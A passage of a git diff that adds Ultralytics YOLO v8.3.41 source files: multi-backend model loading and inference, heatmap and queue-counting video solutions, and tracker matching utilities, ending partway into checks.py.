runtime.deserialize_cuda_engine(f.read()) # read engine + + # Model context + try: + context = model.create_execution_context() + except Exception as e: # model is None + LOGGER.error(f"ERROR: TensorRT model exported with a different version than {trt.__version__}\n") + raise e + + bindings = OrderedDict() + output_names = [] + fp16 = False # default updated below + dynamic = False + is_trt10 = not hasattr(model, "num_bindings") + num = range(model.num_io_tensors) if is_trt10 else range(model.num_bindings) + for i in num: + if is_trt10: + name = model.get_tensor_name(i) + dtype = trt.nptype(model.get_tensor_dtype(name)) + is_input = model.get_tensor_mode(name) == trt.TensorIOMode.INPUT + if is_input: + if -1 in tuple(model.get_tensor_shape(name)): + dynamic = True + context.set_input_shape(name, tuple(model.get_tensor_profile_shape(name, 0)[1])) + if dtype == np.float16: + fp16 = True + else: + output_names.append(name) + shape = tuple(context.get_tensor_shape(name)) + else: # TensorRT < 10.0 + name = model.get_binding_name(i) + dtype = trt.nptype(model.get_binding_dtype(i)) + is_input = model.binding_is_input(i) + if model.binding_is_input(i): + if -1 in tuple(model.get_binding_shape(i)): # dynamic + dynamic = True + context.set_binding_shape(i, tuple(model.get_profile_shape(0, i)[1])) + if dtype == np.float16: + fp16 = True + else: + output_names.append(name) + shape = tuple(context.get_binding_shape(i)) + im = torch.from_numpy(np.empty(shape, dtype=dtype)).to(device) + bindings[name] = Binding(name, dtype, shape, im, int(im.data_ptr())) + binding_addrs = OrderedDict((n, d.ptr) for n, d in bindings.items()) + batch_size = bindings["images"].shape[0] # if dynamic, this is instead max batch size + + # CoreML + elif coreml: + LOGGER.info(f"Loading {w} for CoreML inference...") + import coremltools as ct + + model = ct.models.MLModel(w) + metadata = dict(model.user_defined_metadata) + + # TF SavedModel + elif saved_model: + LOGGER.info(f"Loading {w} for TensorFlow SavedModel inference...") + import tensorflow as tf + + keras = False # assume TF1 saved_model + model = tf.keras.models.load_model(w) if keras else tf.saved_model.load(w) + metadata = Path(w) / "metadata.yaml" + + # TF GraphDef + elif pb: # https://www.tensorflow.org/guide/migrate#a_graphpb_or_graphpbtxt + LOGGER.info(f"Loading {w} for TensorFlow GraphDef inference...") + import tensorflow as tf + + from ultralytics.engine.exporter import gd_outputs + + def wrap_frozen_graph(gd, inputs, outputs): + """Wrap frozen graphs for deployment.""" + x = tf.compat.v1.wrap_function(lambda: tf.compat.v1.import_graph_def(gd, name=""), []) # wrapped + ge = x.graph.as_graph_element + return x.prune(tf.nest.map_structure(ge, inputs), tf.nest.map_structure(ge, outputs)) + + gd = tf.Graph().as_graph_def() # TF GraphDef + with open(w, "rb") as f: + gd.ParseFromString(f.read()) + frozen_func = wrap_frozen_graph(gd, inputs="x:0", outputs=gd_outputs(gd)) + try: # find metadata in SavedModel alongside GraphDef + metadata = next(Path(w).resolve().parent.rglob(f"{Path(w).stem}_saved_model*/metadata.yaml")) + except StopIteration: + pass + + # TFLite or TFLite Edge TPU + elif tflite or edgetpu: # https://www.tensorflow.org/lite/guide/python#install_tensorflow_lite_for_python + try: # https://coral.ai/docs/edgetpu/tflite-python/#update-existing-tf-lite-code-for-the-edge-tpu + from tflite_runtime.interpreter import Interpreter, load_delegate + except ImportError: + import tensorflow as tf + + Interpreter, load_delegate = tf.lite.Interpreter, tf.lite.experimental.load_delegate + if edgetpu: # TF Edge TPU https://coral.ai/software/#edgetpu-runtime + device = device[3:] if str(device).startswith("tpu") else ":0" + LOGGER.info(f"Loading {w} on device {device[1:]} for TensorFlow Lite Edge TPU inference...") + delegate = {"Linux": "libedgetpu.so.1", "Darwin": "libedgetpu.1.dylib", "Windows": "edgetpu.dll"}[ + platform.system() + ] + interpreter = Interpreter( + model_path=w, + experimental_delegates=[load_delegate(delegate, options={"device": device})], + ) + device = "cpu" # Required, otherwise PyTorch will try to use the wrong device + else: # TFLite + LOGGER.info(f"Loading {w} for TensorFlow Lite inference...") + interpreter = Interpreter(model_path=w) # load TFLite model + interpreter.allocate_tensors() # allocate + input_details = interpreter.get_input_details() # inputs + output_details = interpreter.get_output_details() # outputs + # Load metadata + try: + with zipfile.ZipFile(w, "r") as model: + meta_file = model.namelist()[0] + metadata = ast.literal_eval(model.read(meta_file).decode("utf-8")) + except zipfile.BadZipFile: + pass + + # TF.js + elif tfjs: + raise NotImplementedError("YOLOv8 TF.js inference is not currently supported.") + + # PaddlePaddle + elif paddle: + LOGGER.info(f"Loading {w} for PaddlePaddle inference...") + check_requirements("paddlepaddle-gpu" if cuda else "paddlepaddle") + import paddle.inference as pdi # noqa + + w = Path(w) + if not w.is_file(): # if not *.pdmodel + w = next(w.rglob("*.pdmodel")) # get *.pdmodel file from *_paddle_model dir + config = pdi.Config(str(w), str(w.with_suffix(".pdiparams"))) + if cuda: + config.enable_use_gpu(memory_pool_init_size_mb=2048, device_id=0) + predictor = pdi.create_predictor(config) + input_handle = predictor.get_input_handle(predictor.get_input_names()[0]) + output_names = predictor.get_output_names() + metadata = w.parents[1] / "metadata.yaml" + + # MNN + elif mnn: + LOGGER.info(f"Loading {w} for MNN inference...") + check_requirements("MNN") # requires MNN + import os + + import MNN + + config = {} + config["precision"] = "low" + config["backend"] = "CPU" + config["numThread"] = (os.cpu_count() + 1) // 2 + rt = MNN.nn.create_runtime_manager((config,)) + net = MNN.nn.load_module_from_file(w, [], [], runtime_manager=rt, rearrange=True) + + def torch_to_mnn(x): + return MNN.expr.const(x.data_ptr(), x.shape) + + metadata = json.loads(net.get_info()["bizCode"]) + + # NCNN + elif ncnn: + LOGGER.info(f"Loading {w} for NCNN inference...") + check_requirements("git+https://github.com/Tencent/ncnn.git" if ARM64 else "ncnn") # requires NCNN + import ncnn as pyncnn + + net = pyncnn.Net() + net.opt.use_vulkan_compute = cuda + w = Path(w) + if not w.is_file(): # if not *.param + w = next(w.glob("*.param")) # get *.param file from *_ncnn_model dir + net.load_param(str(w)) + net.load_model(str(w.with_suffix(".bin"))) + metadata = w.parent / "metadata.yaml" + + # NVIDIA Triton Inference Server + elif triton: + check_requirements("tritonclient[all]") + from ultralytics.utils.triton import TritonRemoteModel + + model = TritonRemoteModel(w) + + # Any other format (unsupported) + else: + from ultralytics.engine.exporter import export_formats + + raise TypeError( + f"model='{w}' is not a supported model format. Ultralytics supports: {export_formats()['Format']}\n" + f"See https://docs.ultralytics.com/modes/predict for help." + ) + + # Load external metadata YAML + if isinstance(metadata, (str, Path)) and Path(metadata).exists(): + metadata = yaml_load(metadata) + if metadata and isinstance(metadata, dict): + for k, v in metadata.items(): + if k in {"stride", "batch"}: + metadata[k] = int(v) + elif k in {"imgsz", "names", "kpt_shape"} and isinstance(v, str): + metadata[k] = eval(v) + stride = metadata["stride"] + task = metadata["task"] + batch = metadata["batch"] + imgsz = metadata["imgsz"] + names = metadata["names"] + kpt_shape = metadata.get("kpt_shape") + elif not (pt or triton or nn_module): + LOGGER.warning(f"WARNING ⚠️ Metadata not found for 'model={weights}'") + + # Check names + if "names" not in locals(): # names missing + names = default_class_names(data) + names = check_class_names(names) + + # Disable gradients + if pt: + for p in model.parameters(): + p.requires_grad = False + + self.__dict__.update(locals()) # assign all variables to self + + def forward(self, im, augment=False, visualize=False, embed=None): + """ + Runs inference on the YOLOv8 MultiBackend model. + + Args: + im (torch.Tensor): The image tensor to perform inference on. + augment (bool): whether to perform data augmentation during inference, defaults to False + visualize (bool): whether to visualize the output predictions, defaults to False + embed (list, optional): A list of feature vectors/embeddings to return. + + Returns: + (tuple): Tuple containing the raw output tensor, and processed output for visualization (if visualize=True) + """ + b, ch, h, w = im.shape # batch, channel, height, width + if self.fp16 and im.dtype != torch.float16: + im = im.half() # to FP16 + if self.nhwc: + im = im.permute(0, 2, 3, 1) # torch BCHW to numpy BHWC shape(1,320,192,3) + + # PyTorch + if self.pt or self.nn_module: + y = self.model(im, augment=augment, visualize=visualize, embed=embed) + + # TorchScript + elif self.jit: + y = self.model(im) + + # ONNX OpenCV DNN + elif self.dnn: + im = im.cpu().numpy() # torch to numpy + self.net.setInput(im) + y = self.net.forward() + + # ONNX Runtime + elif self.onnx or self.imx: + if self.dynamic: + im = im.cpu().numpy() # torch to numpy + y = self.session.run(self.output_names, {self.session.get_inputs()[0].name: im}) + else: + if not self.cuda: + im = im.cpu() + self.io.bind_input( + name="images", + device_type=im.device.type, + device_id=im.device.index if im.device.type == "cuda" else 0, + element_type=np.float16 if self.fp16 else np.float32, + shape=tuple(im.shape), + buffer_ptr=im.data_ptr(), + ) + self.session.run_with_iobinding(self.io) + y = self.bindings + if self.imx: + # boxes, conf, cls + y = np.concatenate([y[0], y[1][:, :, None], y[2][:, :, None]], axis=-1) + + # OpenVINO + elif self.xml: + im = im.cpu().numpy() # FP32 + + if self.inference_mode in {"THROUGHPUT", "CUMULATIVE_THROUGHPUT"}: # optimized for larger batch-sizes + n = im.shape[0] # number of images in batch + results = [None] * n # preallocate list with None to match the number of images + + def callback(request, userdata): + """Places result in preallocated list using userdata index.""" + results[userdata] = request.results + + # Create AsyncInferQueue, set the callback and start asynchronous inference for each input image + async_queue = self.ov.runtime.AsyncInferQueue(self.ov_compiled_model) + async_queue.set_callback(callback) + for i in range(n): + # Start async inference with userdata=i to specify the position in results list + async_queue.start_async(inputs={self.input_name: im[i : i + 1]}, userdata=i) # keep image as BCHW + async_queue.wait_all() # wait for all inference requests to complete + y = np.concatenate([list(r.values())[0] for r in results]) + + else: # inference_mode = "LATENCY", optimized for fastest first result at batch-size 1 + y = list(self.ov_compiled_model(im).values()) + + # TensorRT + elif self.engine: + if self.dynamic and im.shape != self.bindings["images"].shape: + if self.is_trt10: + self.context.set_input_shape("images", im.shape) + self.bindings["images"] = self.bindings["images"]._replace(shape=im.shape) + for name in self.output_names: + self.bindings[name].data.resize_(tuple(self.context.get_tensor_shape(name))) + else: + i = self.model.get_binding_index("images") + self.context.set_binding_shape(i, im.shape) + self.bindings["images"] = self.bindings["images"]._replace(shape=im.shape) + for name in self.output_names: + i = self.model.get_binding_index(name) + self.bindings[name].data.resize_(tuple(self.context.get_binding_shape(i))) + + s = self.bindings["images"].shape + assert im.shape == s, f"input size {im.shape} {'>' if self.dynamic else 'not equal to'} max model size {s}" + self.binding_addrs["images"] = int(im.data_ptr()) + self.context.execute_v2(list(self.binding_addrs.values())) + y = [self.bindings[x].data for x in sorted(self.output_names)] + + # CoreML + elif self.coreml: + im = im[0].cpu().numpy() + im_pil = Image.fromarray((im * 255).astype("uint8")) + # im = im.resize((192, 320), Image.BILINEAR) + y = self.model.predict({"image": im_pil}) # coordinates are xywh normalized + if "confidence" in y: + raise TypeError( + "Ultralytics only supports inference of non-pipelined CoreML models exported with " + f"'nms=False', but 'model={w}' has an NMS pipeline created by an 'nms=True' export." + ) + # TODO: CoreML NMS inference handling + # from ultralytics.utils.ops import xywh2xyxy + # box = xywh2xyxy(y['coordinates'] * [[w, h, w, h]]) # xyxy pixels + # conf, cls = y['confidence'].max(1), y['confidence'].argmax(1).astype(np.float32) + # y = np.concatenate((box, conf.reshape(-1, 1), cls.reshape(-1, 1)), 1) + elif len(y) == 1: # classification model + y = list(y.values()) + elif len(y) == 2: # segmentation model + y = list(reversed(y.values())) # reversed for segmentation models (pred, proto) + + # PaddlePaddle + elif self.paddle: + im = im.cpu().numpy().astype(np.float32) + self.input_handle.copy_from_cpu(im) + self.predictor.run() + y = [self.predictor.get_output_handle(x).copy_to_cpu() for x in self.output_names] + + # MNN + elif self.mnn: + input_var = self.torch_to_mnn(im) + output_var = self.net.onForward([input_var]) + y = [x.read() for x in output_var] + + # NCNN + elif self.ncnn: + mat_in = self.pyncnn.Mat(im[0].cpu().numpy()) + with self.net.create_extractor() as ex: + ex.input(self.net.input_names()[0], mat_in) + # WARNING: 'output_names' sorted as a temporary fix for https://github.com/pnnx/pnnx/issues/130 + y = [np.array(ex.extract(x)[1])[None] for x in sorted(self.net.output_names())] + + # NVIDIA Triton Inference Server + elif self.triton: + im = im.cpu().numpy() # torch to numpy + y = self.model(im) + + # TensorFlow (SavedModel, GraphDef, Lite, Edge TPU) + else: + im = im.cpu().numpy() + if self.saved_model: # SavedModel + y = self.model(im, training=False) if self.keras else self.model(im) + if not isinstance(y, list): + y = [y] + elif self.pb: # GraphDef + y = self.frozen_func(x=self.tf.constant(im)) + else: # Lite or Edge TPU + details = self.input_details[0] + is_int = details["dtype"] in {np.int8, np.int16} # is TFLite quantized int8 or int16 model + if is_int: + scale, zero_point = details["quantization"] + im = (im / scale + zero_point).astype(details["dtype"]) # de-scale + self.interpreter.set_tensor(details["index"], im) + self.interpreter.invoke() + y = [] + for output in self.output_details: + x = self.interpreter.get_tensor(output["index"]) + if is_int: + scale, zero_point = output["quantization"] + x = (x.astype(np.float32) - zero_point) * scale # re-scale + if x.ndim == 3: # if task is not classification, excluding masks (ndim=4) as well + # Denormalize xywh by image size. See https://github.com/ultralytics/ultralytics/pull/1695 + # xywh are normalized in TFLite/EdgeTPU to mitigate quantization error of integer models + if x.shape[-1] == 6: # end-to-end model + x[:, :, [0, 2]] *= w + x[:, :, [1, 3]] *= h + else: + x[:, [0, 2]] *= w + x[:, [1, 3]] *= h + if self.task == "pose": + x[:, 5::3] *= w + x[:, 6::3] *= h + y.append(x) + # TF segment fixes: export is reversed vs ONNX export and protos are transposed + if len(y) == 2: # segment with (det, proto) output order reversed + if len(y[1].shape) != 4: + y = list(reversed(y)) # should be y = (1, 116, 8400), (1, 160, 160, 32) + if y[1].shape[-1] == 6: # end-to-end model + y = [y[1]] + else: + y[1] = np.transpose(y[1], (0, 3, 1, 2)) # should be y = (1, 116, 8400), (1, 32, 160, 160) + y = [x if isinstance(x, np.ndarray) else x.numpy() for x in y] + + # for x in y: + # print(type(x), len(x)) if isinstance(x, (list, tuple)) else print(type(x), x.shape) # debug shapes + if isinstance(y, (list, tuple)): + if len(self.names) == 999 and (self.task == "segment" or len(y) == 2): # segments and names not defined + ip, ib = (0, 1) if len(y[0].shape) == 4 else (1, 0) # index of protos, boxes + nc = y[ib].shape[1] - y[ip].shape[3] - 4 # y = (1, 160, 160, 32), (1, 116, 8400) + self.names = {i: f"class{i}" for i in range(nc)} + return self.from_numpy(y[0]) if len(y) == 1 else [self.from_numpy(x) for x in y] + else: + return self.from_numpy(y) + + def from_numpy(self, x): + """ + Convert a numpy array to a tensor. + + Args: + x (np.ndarray): The array to be converted. + + Returns: + (torch.Tensor): The converted tensor + """ + return torch.tensor(x).to(self.device) if isinstance(x, np.ndarray) else x + + def warmup(self, imgsz=(1, 3, 640, 640)): + """ + Warm up the model by running one forward pass with a dummy input. + + Args: + imgsz (tuple): The shape of the dummy input tensor in the format (batch_size, channels, height, width) + """ + import torchvision # noqa (import here so torchvision import time not recorded in postprocess time) + + warmup_types = self.pt, self.jit, self.onnx, self.engine, self.saved_model, self.pb, self.triton, self.nn_module + if any(warmup_types) and (self.device.type != "cpu" or self.triton): + im = torch.empty(*imgsz, dtype=torch.half if self.fp16 else torch.float, device=self.device) # input + for _ in range(2 if self.jit else 1): + self.forward(im) # warmup + + @staticmethod + def _model_type(p="path/to/model.pt"): + """ + Takes a path to a model file and returns the model type. Possibles types are pt, jit, onnx, xml, engine, coreml, + saved_model, pb, tflite, edgetpu, tfjs, ncnn or paddle. + + Args: + p: path to the model file. Defaults to path/to/model.pt + + Examples: + >>> model = AutoBackend(weights="path/to/model.onnx") + >>> model_type = model._model_type() # returns "onnx" + """ + from ultralytics.engine.exporter import export_formats + + sf = export_formats()["Suffix"] # export suffixes + if not is_url(p) and not isinstance(p, str): + check_suffix(p, sf) # checks + name = Path(p).name + types = [s in name for s in sf] + types[5] |= name.endswith(".mlmodel") # retain support for older Apple CoreML *.mlmodel formats + types[8] &= not types[9] # tflite &= not edgetpu + if any(types): + triton = False + else: + from urllib.parse import urlsplit + + url = urlsplit(p) + triton = bool(url.netloc) and bool(url.path) and url.scheme in {"http", "grpc"} + + return types + [triton] diff --git a/2024.ultralytics/v8.3.41/solutions/heatmap.py b/2024.ultralytics/v8.3.41/solutions/heatmap.py new file mode 100644 index 0000000..c9dd808 --- /dev/null +++ b/2024.ultralytics/v8.3.41/solutions/heatmap.py @@ -0,0 +1,130 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import cv2 +import numpy as np + +from ultralytics.solutions.object_counter import ObjectCounter +from ultralytics.utils.plotting import Annotator + + +class Heatmap(ObjectCounter): + """ + A class to draw heatmaps in real-time video streams based on object tracks. + + This class extends the ObjectCounter class to generate and visualize heatmaps of object movements in video + streams. It uses tracked object positions to create a cumulative heatmap effect over time. + + Attributes: + initialized (bool): Flag indicating whether the heatmap has been initialized. + colormap (int): OpenCV colormap used for heatmap visualization. + heatmap (np.ndarray): Array storing the cumulative heatmap data. + annotator (Annotator): Object for drawing annotations on the image. + + Methods: + heatmap_effect: Calculates and updates the heatmap effect for a given bounding box. + generate_heatmap: Generates and applies the heatmap effect to each frame. + + Examples: + >>> from ultralytics.solutions import Heatmap + >>> heatmap = Heatmap(model="yolov8n.pt", colormap=cv2.COLORMAP_JET) + >>> results = heatmap("path/to/video.mp4") + >>> for result in results: + ... print(result.speed) # Print inference speed + ... cv2.imshow("Heatmap", result.plot()) + ... if cv2.waitKey(1) & 0xFF == ord("q"): + ... break + """ + + def __init__(self, **kwargs): + """Initializes the Heatmap class for real-time video stream heatmap generation based on object tracks.""" + super().__init__(**kwargs) + + self.initialized = False # bool variable for heatmap initialization + if self.region is not None: # check if user provided the region coordinates + self.initialize_region() + + # store colormap + self.colormap = cv2.COLORMAP_PARULA if self.CFG["colormap"] is None else self.CFG["colormap"] + + def heatmap_effect(self, box): + """ + Efficiently calculates heatmap area and effect location for applying colormap. + + Args: + box (List[float]): Bounding box coordinates [x0, y0, x1, y1]. + + Examples: + >>> heatmap = Heatmap() + >>> box = [100, 100, 200, 200] + >>> heatmap.heatmap_effect(box) + """ + x0, y0, x1, y1 = map(int, box) + radius_squared = (min(x1 - x0, y1 - y0) // 2) ** 2 + + # Create a meshgrid with region of interest (ROI) for vectorized distance calculations + xv, yv = np.meshgrid(np.arange(x0, x1), np.arange(y0, y1)) + + # Calculate squared distances from the center + dist_squared = (xv - ((x0 + x1) // 2)) ** 2 + (yv - ((y0 + y1) // 2)) ** 2 + + # Create a mask of points within the radius + within_radius = dist_squared <= radius_squared + + # Update only the values within the bounding box in a single vectorized operation + self.heatmap[y0:y1, x0:x1][within_radius] += 2 + + def generate_heatmap(self, im0): + """ + Generate heatmap for each frame using Ultralytics. + + Args: + im0 (np.ndarray): Input image array for processing. + + Returns: + (np.ndarray): Processed image with heatmap overlay and object counts (if region is specified). + + Examples: + >>> heatmap = Heatmap() + >>> im0 = cv2.imread("image.jpg") + >>> result = heatmap.generate_heatmap(im0) + """ + if not self.initialized: + self.heatmap = np.zeros_like(im0, dtype=np.float32) * 0.99 + self.initialized = True # Initialize heatmap only once + + self.annotator = Annotator(im0, line_width=self.line_width) # Initialize annotator + self.extract_tracks(im0) # Extract tracks + + # Iterate over bounding boxes, track ids and classes index + for box, track_id, cls in zip(self.boxes, self.track_ids, self.clss): + # Draw bounding box and counting region + self.heatmap_effect(box) + + if self.region is not None: + self.annotator.draw_region(reg_pts=self.region, color=(104, 0, 123), thickness=self.line_width * 2) + self.store_tracking_history(track_id, box) # Store track history + self.store_classwise_counts(cls) # store classwise counts in dict + current_centroid = ((box[0] + box[2]) / 2, (box[1] + box[3]) / 2) + # Store tracking previous position and perform object counting + prev_position = None + if len(self.track_history[track_id]) > 1: + prev_position = self.track_history[track_id][-2] + self.count_objects(current_centroid, track_id, prev_position, cls) # Perform object counting + + if self.region is not None: + self.display_counts(im0) # Display the counts on the frame + + # Normalize, apply colormap to heatmap and combine with original image + if self.track_data.id is not None: + im0 = cv2.addWeighted( + im0, + 0.5, + cv2.applyColorMap( + cv2.normalize(self.heatmap, None, 0, 255, cv2.NORM_MINMAX).astype(np.uint8), self.colormap + ), + 0.5, + 0, + ) + + self.display_output(im0) # display output with base class function + return im0 # return output image for more usage diff --git a/2024.ultralytics/v8.3.41/solutions/queue_management.py b/2024.ultralytics/v8.3.41/solutions/queue_management.py new file mode 100644 index 0000000..ca0acb1 --- /dev/null +++ b/2024.ultralytics/v8.3.41/solutions/queue_management.py @@ -0,0 +1,109 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +from ultralytics.solutions.solutions import BaseSolution +from ultralytics.utils.plotting import Annotator, colors + + +class QueueManager(BaseSolution): + """ + Manages queue counting in real-time video streams based on object tracks. + + This class extends BaseSolution to provide functionality for tracking and counting objects within a specified + region in video frames. + + Attributes: + counts (int): The current count of objects in the queue. + rect_color (Tuple[int, int, int]): RGB color tuple for drawing the queue region rectangle. + region_length (int): The number of points defining the queue region. + annotator (Annotator): An instance of the Annotator class for drawing on frames. + track_line (List[Tuple[int, int]]): List of track line coordinates. + track_history (Dict[int, List[Tuple[int, int]]]): Dictionary storing tracking history for each object. + + Methods: + initialize_region: Initializes the queue region. + process_queue: Processes a single frame for queue management. + extract_tracks: Extracts object tracks from the current frame. + store_tracking_history: Stores the tracking history for an object. + display_output: Displays the processed output. + + Examples: + >>> queue_manager = QueueManager(source="video.mp4", region=[100, 100, 200, 200, 300, 300]) + >>> for frame in video_stream: + ... processed_frame = queue_manager.process_queue(frame) + ... cv2.imshow("Queue Management", processed_frame) + """ + + def __init__(self, **kwargs): + """Initializes the QueueManager with parameters for tracking and counting objects in a video stream.""" + super().__init__(**kwargs) + self.initialize_region() + self.counts = 0 # Queue counts Information + self.rect_color = (255, 255, 255) # Rectangle color + self.region_length = len(self.region) # Store region length for further usage + + def process_queue(self, im0): + """ + Processes the queue management for a single frame of video. + + Args: + im0 (numpy.ndarray): Input image for processing, typically a frame from a video stream. + + Returns: + (numpy.ndarray): Processed image with annotations, bounding boxes, and queue counts. + + This method performs the following steps: + 1. Resets the queue count for the current frame. + 2. Initializes an Annotator object for drawing on the image. + 3. Extracts tracks from the image. + 4. Draws the counting region on the image. + 5. For each detected object: + - Draws bounding boxes and labels. + - Stores tracking history. + - Draws centroids and tracks. + - Checks if the object is inside the counting region and updates the count. + 6. Displays the queue count on the image. + 7. Displays the processed output. + + Examples: + >>> queue_manager = QueueManager() + >>> frame = cv2.imread("frame.jpg") + >>> processed_frame = queue_manager.process_queue(frame) + """ + self.counts = 0 # Reset counts every frame + self.annotator = Annotator(im0, line_width=self.line_width) # Initialize annotator + self.extract_tracks(im0) # Extract tracks + + self.annotator.draw_region( + reg_pts=self.region, color=self.rect_color, thickness=self.line_width * 2 + ) # Draw region + + for box, track_id, cls in zip(self.boxes, self.track_ids, self.clss): + # Draw bounding box and counting region + self.annotator.box_label(box, label=self.names[cls], color=colors(track_id, True)) + self.store_tracking_history(track_id, box) # Store track history + + # Draw tracks of objects + self.annotator.draw_centroid_and_tracks( + self.track_line, color=colors(int(track_id), True), track_thickness=self.line_width + ) + + # Cache frequently accessed attributes + track_history = self.track_history.get(track_id, []) + + # store previous position of track and check if the object is inside the counting region + prev_position = None + if len(track_history) > 1: + prev_position = track_history[-2] + if self.region_length >= 3 and prev_position and self.r_s.contains(self.Point(self.track_line[-1])): + self.counts += 1 + + # Display queue counts + self.annotator.queue_counts_display( + f"Queue Counts : {str(self.counts)}", + points=self.region, + region_color=self.rect_color, + txt_color=(104, 31, 17), + ) + self.display_output(im0) # display output with base class function + + return im0 # return output image for more usage diff --git a/2024.ultralytics/v8.3.41/trackers/utils/matching.py b/2024.ultralytics/v8.3.41/trackers/utils/matching.py new file mode 100644 index 0000000..b062d93 --- /dev/null +++ b/2024.ultralytics/v8.3.41/trackers/utils/matching.py @@ -0,0 +1,157 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import numpy as np +import scipy +from scipy.spatial.distance import cdist + +from ultralytics.utils.metrics import batch_probiou, bbox_ioa + +try: + import lap # for linear_assignment + + assert lap.__version__ # verify package is not directory +except (ImportError, AssertionError, AttributeError): + from ultralytics.utils.checks import check_requirements + + check_requirements("lapx>=0.5.2") # update to lap package from https://github.com/rathaROG/lapx + import lap + + +def linear_assignment(cost_matrix: np.ndarray, thresh: float, use_lap: bool = True) -> tuple: + """ + Perform linear assignment using either the scipy or lap.lapjv method. + + Args: + cost_matrix (np.ndarray): The matrix containing cost values for assignments, with shape (N, M). + thresh (float): Threshold for considering an assignment valid. + use_lap (bool): Use lap.lapjv for the assignment. If False, scipy.optimize.linear_sum_assignment is used. + + Returns: + matched_indices (np.ndarray): Array of matched indices of shape (K, 2), where K is the number of matches. + unmatched_a (np.ndarray): Array of unmatched indices from the first set, with shape (L,). + unmatched_b (np.ndarray): Array of unmatched indices from the second set, with shape (M,). + + Examples: + >>> cost_matrix = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]]) + >>> thresh = 5.0 + >>> matched_indices, unmatched_a, unmatched_b = linear_assignment(cost_matrix, thresh, use_lap=True) + """ + if cost_matrix.size == 0: + return np.empty((0, 2), dtype=int), tuple(range(cost_matrix.shape[0])), tuple(range(cost_matrix.shape[1])) + + if use_lap: + # Use lap.lapjv + # https://github.com/gatagat/lap + _, x, y = lap.lapjv(cost_matrix, extend_cost=True, cost_limit=thresh) + matches = [[ix, mx] for ix, mx in enumerate(x) if mx >= 0] + unmatched_a = np.where(x < 0)[0] + unmatched_b = np.where(y < 0)[0] + else: + # Use scipy.optimize.linear_sum_assignment + # https://docs.scipy.org/doc/scipy/reference/generated/scipy.optimize.linear_sum_assignment.html + x, y = scipy.optimize.linear_sum_assignment(cost_matrix) # row x, col y + matches = np.asarray([[x[i], y[i]] for i in range(len(x)) if cost_matrix[x[i], y[i]] <= thresh]) + if len(matches) == 0: + unmatched_a = list(np.arange(cost_matrix.shape[0])) + unmatched_b = list(np.arange(cost_matrix.shape[1])) + else: + unmatched_a = list(set(np.arange(cost_matrix.shape[0])) - set(matches[:, 0])) + unmatched_b = list(set(np.arange(cost_matrix.shape[1])) - set(matches[:, 1])) + + return matches, unmatched_a, unmatched_b + + +def iou_distance(atracks: list, btracks: list) -> np.ndarray: + """ + Compute cost based on Intersection over Union (IoU) between tracks. + + Args: + atracks (list[STrack] | list[np.ndarray]): List of tracks 'a' or bounding boxes. + btracks (list[STrack] | list[np.ndarray]): List of tracks 'b' or bounding boxes. + + Returns: + (np.ndarray): Cost matrix computed based on IoU. + + Examples: + Compute IoU distance between two sets of tracks + >>> atracks = [np.array([0, 0, 10, 10]), np.array([20, 20, 30, 30])] + >>> btracks = [np.array([5, 5, 15, 15]), np.array([25, 25, 35, 35])] + >>> cost_matrix = iou_distance(atracks, btracks) + """ + if atracks and isinstance(atracks[0], np.ndarray) or btracks and isinstance(btracks[0], np.ndarray): + atlbrs = atracks + btlbrs = btracks + else: + atlbrs = [track.xywha if track.angle is not None else track.xyxy for track in atracks] + btlbrs = [track.xywha if track.angle is not None else track.xyxy for track in btracks] + + ious = np.zeros((len(atlbrs), len(btlbrs)), dtype=np.float32) + if len(atlbrs) and len(btlbrs): + if len(atlbrs[0]) == 5 and len(btlbrs[0]) == 5: + ious = batch_probiou( + np.ascontiguousarray(atlbrs, dtype=np.float32), + np.ascontiguousarray(btlbrs, dtype=np.float32), + ).numpy() + else: + ious = bbox_ioa( + np.ascontiguousarray(atlbrs, dtype=np.float32), + np.ascontiguousarray(btlbrs, dtype=np.float32), + iou=True, + ) + return 1 - ious # cost matrix + + +def embedding_distance(tracks: list, detections: list, metric: str = "cosine") -> np.ndarray: + """ + Compute distance between tracks and detections based on embeddings. + + Args: + tracks (list[STrack]): List of tracks, where each track contains embedding features. + detections (list[BaseTrack]): List of detections, where each detection contains embedding features. + metric (str): Metric for distance computation. Supported metrics include 'cosine', 'euclidean', etc. + + Returns: + (np.ndarray): Cost matrix computed based on embeddings with shape (N, M), where N is the number of tracks + and M is the number of detections. + + Examples: + Compute the embedding distance between tracks and detections using cosine metric + >>> tracks = [STrack(...), STrack(...)] # List of track objects with embedding features + >>> detections = [BaseTrack(...), BaseTrack(...)] # List of detection objects with embedding features + >>> cost_matrix = embedding_distance(tracks, detections, metric="cosine") + """ + cost_matrix = np.zeros((len(tracks), len(detections)), dtype=np.float32) + if cost_matrix.size == 0: + return cost_matrix + det_features = np.asarray([track.curr_feat for track in detections], dtype=np.float32) + # for i, track in enumerate(tracks): + # cost_matrix[i, :] = np.maximum(0.0, cdist(track.smooth_feat.reshape(1,-1), det_features, metric)) + track_features = np.asarray([track.smooth_feat for track in tracks], dtype=np.float32) + cost_matrix = np.maximum(0.0, cdist(track_features, det_features, metric)) # Normalized features + return cost_matrix + + +def fuse_score(cost_matrix: np.ndarray, detections: list) -> np.ndarray: + """ + Fuses cost matrix with detection scores to produce a single similarity matrix. + + Args: + cost_matrix (np.ndarray): The matrix containing cost values for assignments, with shape (N, M). + detections (list[BaseTrack]): List of detections, each containing a score attribute. + + Returns: + (np.ndarray): Fused similarity matrix with shape (N, M). + + Examples: + Fuse a cost matrix with detection scores + >>> cost_matrix = np.random.rand(5, 10) # 5 tracks and 10 detections + >>> detections = [BaseTrack(score=np.random.rand()) for _ in range(10)] + >>> fused_matrix = fuse_score(cost_matrix, detections) + """ + if cost_matrix.size == 0: + return cost_matrix + iou_sim = 1 - cost_matrix + det_scores = np.array([det.score for det in detections]) + det_scores = np.expand_dims(det_scores, axis=0).repeat(cost_matrix.shape[0], axis=0) + fuse_sim = iou_sim * det_scores + return 1 - fuse_sim # fuse_cost diff --git a/2024.ultralytics/v8.3.41/utils/checks.py b/2024.ultralytics/v8.3.41/utils/checks.py new file mode 100644 index 0000000..3a8201a --- /dev/null +++ b/2024.ultralytics/v8.3.41/utils/checks.py @@ -0,0 +1,776 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import glob +import inspect +import math +import os +import platform +import re +import shutil +import subprocess +import time +from importlib import metadata +from pathlib import Path +from typing import Optional + +import cv2 +import 